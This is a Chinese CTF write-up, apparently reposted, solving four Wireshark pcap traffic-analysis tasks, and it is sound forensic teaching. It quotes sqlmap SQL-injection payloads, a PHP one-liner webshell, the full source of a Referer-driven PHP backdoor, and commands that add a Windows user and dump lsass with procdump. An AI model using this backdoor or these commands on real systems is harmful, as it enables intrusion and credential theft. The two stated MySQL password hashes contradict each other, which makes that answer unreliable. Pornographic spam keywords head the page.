国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Wireshark流量分析例題

這篇具有很好參考價(jià)值的文章主要介紹了Wireshark流量分析例題。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問。

目錄

前言?

一、題目一(1.pcap)

二、題目二(2.pcap)

三、題目三(3.pcap)

四、題目四(4.pcap)


前言?

Wireshark流量包分析對(duì)于安全來說是很重要的,我們可以通過Wireshark來診斷網(wǎng)絡(luò)問題,檢測網(wǎng)絡(luò)攻擊、監(jiān)控網(wǎng)絡(luò)流量以及捕獲惡意軟件等等

接下來我們來看一道數(shù)據(jù)分析題,需要4個(gè)流量包 1-4.pcap,網(wǎng)盤鏈接自行提取

鏈接:https://pan.baidu.com/s/1gTL_l0Xk2xP3ZNWYvBWi8g?pwd=d6g7?
提取碼:d6g7

一、題目一(1.pcap)

題目要求:

1.黑客攻擊的第一個(gè)受害主機(jī)的網(wǎng)卡IP地址

2.黑客對(duì)URL的哪一個(gè)參數(shù)實(shí)施了SQL注入

3.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的表前綴(加上下劃線例如abc)

4.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的名字

看到題目SQL注入,那就首先過濾http和https協(xié)議

過濾后可以看到兩個(gè)出現(xiàn)次數(shù)比較多的ip,202.1.1.2和192.168.1.8,可以看到202.1.1.2對(duì)192.168.1.8進(jìn)行了攻擊

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

這里第一個(gè)問題的答案就出來了,受害主機(jī)網(wǎng)卡IP是192.168.1.8 ,202.1.1.2為攻擊者IP

然后直接看源IP為202.1.1.2的http請求包

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全這里隨便先看一個(gè)包,urlcode解碼后如下

可以看到黑客使用了SQL注入,試圖構(gòu)造存儲(chǔ)型xss

option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(&XfqR=2916 AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',tab

再看一個(gè)包,同樣urlcode解碼

分析后發(fā)現(xiàn)仍在嘗試SQL注入,注入工具sqlmap,注入點(diǎn)為list[select]

option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(883

然后我們?nèi)プ粉櫼粋€(gè)SQL注入的TCP流

可以看到數(shù)據(jù)庫為MariaDB,已經(jīng)報(bào)錯(cuò),而且表前綴為ajtuc_

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

要找到數(shù)據(jù)庫名的話,我們最好去最后那幾條去找,看到url中如果包含schema關(guān)鍵字,那大概率就是數(shù)據(jù)庫名

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

這里的數(shù)據(jù)庫名使用十六進(jìn)制解碼,解碼出來就是joomla

答案:

1.黑客攻擊的第一個(gè)受害主機(jī)的網(wǎng)卡IP地址?
192.168.1.8
2.黑客對(duì)URL的哪一個(gè)參數(shù)實(shí)施了SQL注入
list[select]
3.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的表前綴(加上下劃線例如abc_)
ajtuc_
4.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的名字
joomla

二、題目二(2.pcap)

打開2.pcap

題目要求:

1.黑客第一次獲得的php木馬的密碼是什么

2.黑客第二次上傳php木馬是什么時(shí)間

3.第二次上傳的木馬通過HTTP協(xié)議中的哪個(gè)頭傳遞數(shù)據(jù)

題目要求php木馬的密碼,首先我們要知道php一句話木馬一般都是POST請求

所以我們直接過濾POST請求,發(fā)現(xiàn)這個(gè)IP請求了一個(gè)名為kkkaaa.php的php文件,很可疑

正常文件不會(huì)以此命名的, 打開數(shù)據(jù)包看一下,發(fā)現(xiàn)了這個(gè)字段

Form item: "zzz" = "@eval(base64_decode($_POST[z0]));"

其實(shí)一句話木馬密碼已經(jīng)出來了,就是zzz

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

這里他上傳的一句話木馬應(yīng)該是

<?php eval($_POST['zzz']);?>

然后又將eval(base64_decode($_POST[z0]));傳入zzz參數(shù),目的是將z0傳入的數(shù)據(jù)進(jìn)行base64的解碼

此時(shí)z0傳入base64編碼后的數(shù)據(jù),便可以執(zhí)行惡意代碼

解碼后發(fā)現(xiàn)執(zhí)行了dirname函數(shù),目的是查看當(dāng)前路徑下的文件或目錄,類似linux下的ls命令

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

第二題是第二次上傳木馬的時(shí)間

沒有頭緒的話來分析下過濾出來的這幾個(gè)包,其他參數(shù)都一樣,重要的是Length這個(gè)字段

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

第一個(gè)包毋庸置疑是會(huì)比其他包長一點(diǎn),但是第四個(gè)包很奇怪,和其他包相比長了150多字節(jié)左右

追蹤tcp流

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

可以明顯看到z2很不正常,其他參數(shù)都是urlcode和base64編碼

z2使用十六進(jìn)制編碼,我們來解碼看一下

這樣的PHP代碼是通過混淆過的,讓我們根本看不懂他的代碼

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

經(jīng)過還原后的代碼:?

<?php
$kh = "cb42";
$kf = "e130";
function x($t, $k)
{
    $c = strlen($k);
    $l = strlen($t);
    $o = "";
    for ($i = 0; $i < $l;) {
        for ($j = 0; ($j < $c && $i < $l); $j++, $i++) {
            $o .= $t{$i} ^ $k{$j};
        }
    }
    return $o;
}

$r = $_SERVER;
$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];
if ($rr && $ra) {
    $u = parse_url($rr);
    parse_str($u["query"], $q);
    $q = array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/", $ra, $m);
    if ($q && $m) {
        @session_start();
        $s =& $_SESSION;
        $ss = "substr";
        $sl = "strtolower";
        $i = $m[1][0] . $m[1][4];
        $h = $sl($ss(md5($i . $kh), 0, 3));
        $f = $sl($ss(md5($i . $kf), 0, 3));
        $p = "";
        for ($z = 1; $z < count($m[1]); $z++) $p .= $q[$m[2][$z]];
        if (strpos($p, $h) === 0) {
            $s[$i] = "";
            $p = $ss($p, 3);
        }
        if (array_key_exists($i, $s)) {
            $s[$i] .= $p;
            $e = strpos($s[$i], $f);
            if ($e) {
                $k = $kh . $kf;
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/", "/-/"), array("/", "+"), $ss($s[$i], 0, $e))), $k)));
                $o = ob_get_contents();
                ob_end_clean();
                $d = base64_encode(x(gzcompress($o), $k));
                print("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}
?>

檢查后發(fā)現(xiàn)create_function函數(shù),這個(gè)函數(shù)是可以執(zhí)行命令的

官方也提示這個(gè)函數(shù)在8.0已經(jīng)被移除,并且和eval()函數(shù)有同樣的安全隱患

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全說明黑客是利用了create_function函數(shù)來上傳了自己的木馬

時(shí)間的話,ctrl+f,選擇分組詳情,選擇字符串,搜索time字符串,時(shí)間就出來了

Feb ?7, 2018 17:20:44.248365000 中國標(biāo)準(zhǔn)時(shí)間

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

然后我們來分析一下這個(gè)木馬

木馬要利用,就必然會(huì)與數(shù)據(jù)包進(jìn)行交互,仔細(xì)看看這兩行代碼

$rr = @$r["HTTP_REFERER"];
$ra = @$r["HTTP_ACCEPT_LANGUAGE"];

這兩行代碼是獲取http請求中的referer和accept_language字段的,與數(shù)據(jù)包產(chǎn)生了交互

所以可以基本斷定這兩個(gè)字段是黑客用來傳輸他想執(zhí)行的命令的

我們隨便看一個(gè)訪問footer.php的包

發(fā)現(xiàn)Referer字段長度很不正常,Accept-Language字段正常

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

所以可以基本確定,木馬通過HTTP協(xié)議中的referer頭傳遞數(shù)據(jù)

答案?

1.黑客第一次獲得的php木馬的密碼是什么
zzz
2.黑客第二次上傳php木馬是什么時(shí)間
17:20:44.248365
3.第二次上傳的木馬通過HTTP協(xié)議中的哪個(gè)頭傳遞數(shù)據(jù)
Referer

三、題目三(3.pcap)

打開3.pcap

題目要求:

1.內(nèi)網(wǎng)主機(jī)的mysql用戶名和請求連接的密碼hash是多少(用戶:密碼hash)

2.php代理第一次被使用時(shí)最先連接了哪個(gè)IP地址

題目要求mysql的數(shù)據(jù),直接過濾,tcp contains "mysql" && mysql

發(fā)現(xiàn)黑客一直在爆破MySQL密碼

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

我們找到最后一條,可能是爆破成功的密碼

用戶:admin

密碼Hash:4858e7dcb0968daa7b599be4b0edb88a25ad89ac

然后過濾http請求,發(fā)現(xiàn)名為tunnel.php的php文件

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

點(diǎn)開可以清晰地看到php代理第一次連接的IP地址是4.2.2.2,端口53?

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

答案

1.內(nèi)網(wǎng)主機(jī)的mysql用戶名和請求連接的密碼hash是多少(用戶:密碼hash)
? ?admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4
2.php代理第一次被使用時(shí)最先連接了哪個(gè)IP地址
? ?4.2.2.2

四、題目四(4.pcap)

打開4.pcap

題目要求:

1.黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在什么時(shí)候

2.黑客在內(nèi)網(wǎng)主機(jī)中添加的用戶名和密碼是多少

3.黑客從內(nèi)網(wǎng)服務(wù)器中下載下來的文件名

獲取當(dāng)前目錄的文件列表的命令,Windows中是dir,linux中是ls

直接過濾

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "dir" || http contains "ls")

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

發(fā)現(xiàn)有l(wèi)s,也有dir

追蹤tcp流,發(fā)現(xiàn)第一次的ls沒有執(zhí)行成功,因?yàn)闆]有服務(wù)器回顯

第二次的dir執(zhí)行成功了

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

?搜索時(shí)間Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

Feb ?7, 2018 18:36:59.770782000 中國標(biāo)準(zhǔn)時(shí)間

在Windows下添加用戶必然要使用net user,管理員用戶回顯Administrator,所以我們直接過濾

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "user" || http contains "Administrator")

這里看到是沒有任何用戶的,時(shí)間Feb ?7, 2018 18:49:27.767754000 中國標(biāo)準(zhǔn)時(shí)間

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

再往后面看發(fā)現(xiàn)已經(jīng)添加了管理員用戶kaka,時(shí)間

Feb ?7, 2018 18:50:42.908737000 中國標(biāo)準(zhǔn)時(shí)間?

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

那么黑客必然是在這個(gè)時(shí)間段執(zhí)行了添加用戶的命令

然后我們就來看這期間的http請求,直接通過時(shí)間過濾

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && http && frame.time_relative >= 827.109385 && frame.time_relative <= 902.267039

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

最終我們發(fā)現(xiàn)這個(gè)不尋常的請求

通過base64解碼發(fā)現(xiàn)

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]

用戶名和密碼分別為? ?kaka:kaka

最后一題是下載,一句話木馬是POST請求,而且攻擊的IP地址為192.168.2.20,那就直接過濾

ip.dst == 192.168.2.20 && http.request.method == POST

篩出來之后沒辦法只有一個(gè)個(gè)看,base64解碼?

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

然后在最后發(fā)現(xiàn)了這個(gè)包

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

解碼后:?

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lspasss.dmp&echo [S]&cd&echo [E]?

發(fā)現(xiàn)使用了procdump.exe

往后看發(fā)現(xiàn)了這個(gè)包

Wireshark流量分析例題,安全,wireshark,測試工具,網(wǎng)絡(luò),安全

解碼出來是這樣的?

C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp

最后我們可以確定,黑客下載了lsass.exe_180208_185247.dmp文件

答案

1.黑客第一次獲取到當(dāng)前目錄下的文件列表的漏洞利用請求發(fā)生在什么時(shí)候
Feb ?7, 2018 18:36:59.770782000
2.黑客在內(nèi)網(wǎng)主機(jī)中添加的用戶名和密碼是多少
kaka:kaka
3.黑客從內(nèi)網(wǎng)服務(wù)器中下載下來的文件名
lsass.exe_180208_185247.dmp文章來源地址http://www.zghlxwxcb.cn/news/detail-671543.html

到了這里,關(guān)于Wireshark流量分析例題的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • Wireshark流量分析

    Wireshark流量分析

    目錄 1.基本介紹 2.基本使用 1)數(shù)據(jù)包篩選: 2)篩選ip: 3)數(shù)據(jù)包還原 ?4)數(shù)據(jù)提取 ?3.wireshark實(shí)例 1. 基本介紹 在CTF比賽中,對(duì)于流量包的分析取證是一種十分重要的題型。通常這類題目都是會(huì)提供一個(gè)包含流量數(shù)據(jù)的pcap文件,參賽選手通過該文件篩選和過濾其中無關(guān)的流

    2024年02月11日
    瀏覽(17)
  • 流量分析:wireshark的使用

    流量分析:wireshark的使用

    wireshark使用教程博客 https://www.cnblogs.com/cainiao-chuanqi/p/15910553.html?spm=wolai.workspace.0.0.3768135baBU0KJ 1、過濾查看包含某字符串的HTTP數(shù)據(jù)包: http contains \\\"string\\\" (tcp同理) 2 、過濾查看請求某一url的流量: http.request.url ==\\\"path\\\" 或 http.request.url contains \\\"path\\\" 3、過濾某一ip的流量: ip.addr =

    2024年02月10日
    瀏覽(24)
  • 簡單流量分析CTF(wireshark)

    簡單流量分析CTF(wireshark)

    沒做過流量分析的題目,也不怎么了解怎么流量分析,準(zhǔn)備系統(tǒng)的理一下思路。。 這有第一個(gè)小題目。通過幾個(gè)題目來了解wireshark的使用以及流量分析吧。。 bugku的雜項(xiàng)題目。 鏈接:https://pan.baidu.com/s/1OnO7OXIQB8ztl8J2q48jBA 提取碼:1111 這是一個(gè) pacp文件? 是一種常用的數(shù)據(jù)報(bào)存

    2024年02月07日
    瀏覽(26)
  • Wireshark流量分析還原zip文件

    Wireshark流量分析還原zip文件

    以下內(nèi)容為數(shù)據(jù)取證靶場題目 通過提示下載流量包,導(dǎo)入到wireshark開始分析 此處發(fā)現(xiàn)訪問了可疑的壓縮包文件 通過右鍵 追蹤TCP流 進(jìn)一步分析 以下為該壓縮包的請求包和響應(yīng)包內(nèi)容,我們需要的是響應(yīng)包中的響應(yīng)體 選中該http請求后,選擇Media Type,右鍵選擇 導(dǎo)出分組字節(jié)流

    2024年02月17日
    瀏覽(26)
  • suricata初體驗(yàn)+wireshark流量分析

    suricata初體驗(yàn)+wireshark流量分析

    目錄 一、suricata介紹 1.下載安裝 2.如何使用-攻擊模擬 二、wireshark流量分析 1.wireshark過濾器使用 ?2.wireshark其他使用 通過官網(wǎng)下載suricata,根據(jù)官網(wǎng)步驟進(jìn)行安裝。 ? ?以上配置完畢后,重啟suricata。 ?進(jìn)入wazuh匹配文件,需將suricata加入,使wazuh代理可以讀取suricata日志文件。

    2024年02月11日
    瀏覽(57)
  • 如何使用Wireshark進(jìn)行網(wǎng)絡(luò)流量分析?

    如何使用Wireshark進(jìn)行網(wǎng)絡(luò)流量分析?

    如何使用Wireshark進(jìn)行網(wǎng)絡(luò)流量分析。Wireshark是一款強(qiáng)大的網(wǎng)絡(luò)協(xié)議分析工具,可以幫助我們深入了解網(wǎng)絡(luò)通信和數(shù)據(jù)流動(dòng)。 1. 什么是Wireshark? Wireshark是一個(gè)開源的網(wǎng)絡(luò)協(xié)議分析工具,它可以捕獲并分析網(wǎng)絡(luò)數(shù)據(jù)包,幫助用戶深入了解網(wǎng)絡(luò)通信過程,識(shí)別潛在的問題和安全威

    2024年02月11日
    瀏覽(25)
  • 【網(wǎng)絡(luò)工程】網(wǎng)絡(luò)流量分析工具 Wireshark

    【網(wǎng)絡(luò)工程】網(wǎng)絡(luò)流量分析工具 Wireshark

    Wireshark (前身 Ethereal):它是一個(gè)強(qiáng)大的網(wǎng)絡(luò)封包分析軟件工具 ! 此工具使用WinPCAP作為接口,直接與網(wǎng)卡進(jìn)行數(shù)據(jù)報(bào)文交換。主要用來捕獲截取網(wǎng)絡(luò)數(shù)據(jù)包的,并自動(dòng)解析數(shù)據(jù)包為用戶顯示數(shù)據(jù)包詳細(xì)信息,供用戶對(duì)數(shù)據(jù)包進(jìn)行分析。 下載及安裝: 點(diǎn)擊這里 1.打開網(wǎng)址,進(jìn)入

    2024年02月13日
    瀏覽(18)
  • 用wireshark流量分析的四個(gè)案例

    用wireshark流量分析的四個(gè)案例

    目錄 第一題 1 2 3 4 第二題 1 2 3. 第三題 1 2 第四題 1 2 3 題目: 1.黑客攻擊的第一個(gè)受害主機(jī)的網(wǎng)卡IP地址 2.黑客對(duì)URL的哪一個(gè)參數(shù)實(shí)施了SQL注入 3.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的表前綴(加上下劃線例如abc ) 4.第一個(gè)受害主機(jī)網(wǎng)站數(shù)據(jù)庫的名字 打開流量包,直接篩選http || tls找

    2024年02月10日
    瀏覽(27)
  • 流量分析-Wireshark -操作手冊(不能說最全,只能說更全)

    流量分析-Wireshark -操作手冊(不能說最全,只能說更全)

    流量分析-Wireshark -操作手冊(不能說最全,只能說更全) 基于各種比賽做的總解 基于協(xié)議過濾?法 ?? 常用篩選命令方法 常?快捷鍵 ?? 數(shù)據(jù)包篩選 等等 ?絡(luò)流量分析是指捕捉?絡(luò)中流動(dòng)的數(shù)據(jù)包,并通過查看包內(nèi)部數(shù)據(jù)以及進(jìn)?相關(guān)的協(xié)議、流量分析、統(tǒng)計(jì)等來發(fā)現(xiàn)?

    2024年02月07日
    瀏覽(25)
  • 使用Microsoft Network Monitor分析Wireshark無法解析的SSL流量包

    使用Microsoft Network Monitor分析Wireshark無法解析的SSL流量包

    在某次實(shí)驗(yàn)中發(fā)現(xiàn)wireshark抓到的ssl流量包無法政策解析Server Hello的數(shù)據(jù)。 在朋友的建議下使用Microsoft Network Monitor工具打開流量包,但Wireshark所抓的流量包格式為pcapng,Microsoft Network Monitor無法正常解析。所以需要使用Wireshark將其另存為Microsoft Network Monitor能解析的cap格式流量包

    2024年02月04日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包